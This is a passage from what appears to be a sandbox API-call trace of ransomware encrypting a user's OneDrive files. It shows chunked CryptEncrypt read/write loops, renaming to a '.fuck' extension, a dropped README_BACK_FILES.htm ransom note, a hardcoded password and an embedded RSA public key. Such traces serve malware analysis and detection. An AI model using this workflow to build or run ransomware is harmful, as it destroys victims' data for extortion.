hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.373] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.373] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.373] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.373] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.373] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.373] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.374] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.374] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.374] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.374] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.374] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.374] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.374] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.374] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.374] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.374] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.374] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.374] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.374] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.375] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.375] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.375] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.375] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.375] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.375] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.375] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.375] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.375] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.375] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.375] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.375] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.375] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.375] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.375] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.376] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.376] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.376] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.376] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.376] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.376] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.376] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.376] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.376] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.376] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.376] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.376] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.376] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.376] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.377] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.377] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.377] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.377] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.377] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.377] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.377] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.377] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.378] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.378] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.378] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.378] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.378] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.378] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.378] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.378] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.378] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.378] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.378] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.378] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.379] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0274.379] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x250, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x260) returned 1 [0274.379] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x260, lpOverlapped=0x0) returned 1 [0274.379] CloseHandle (hObject=0x5d3c) returned 1 [0274.379] CloseHandle (hObject=0x5d48) returned 1 [0274.379] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0274.385] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0274.386] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0274.388] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0274.390] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0274.390] CryptDestroyKey (hKey=0x2faac8) returned 1 [0274.390] CryptReleaseContext (hProv=0x2f2ac90, dwFlags=0x0) returned 1 [0274.390] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0274.390] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0274.390] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\readme_back_files.htm")) returned 0xffffffff [0274.390] AreFileApisANSI () returned 1 [0274.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0274.390] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.391] GetFileType (hFile=0x5d4c) returned 0x1 [0274.391] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0274.392] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.393] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0274.393] GetLastError () returned 0x0 [0274.393] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\Error.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\error.png")) returned 0x20 [0274.394] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\Error.png", dwFileAttributes=0x80) returned 1 [0274.395] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\Error.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\error.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.396] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\Error.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\error.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.397] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\Error.png.gsg", dwFileAttributes=0x2) returned 1 [0274.398] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0274.400] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0274.400] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0274.400] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.400] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0274.400] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.400] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0274.400] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f29e38) returned 1 [0274.401] CryptImportPublicKeyInfo (in: hCryptProv=0x2f29e38, dwCertEncodingType=0x1, pInfo=0x2f33e30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33e60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33e68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: 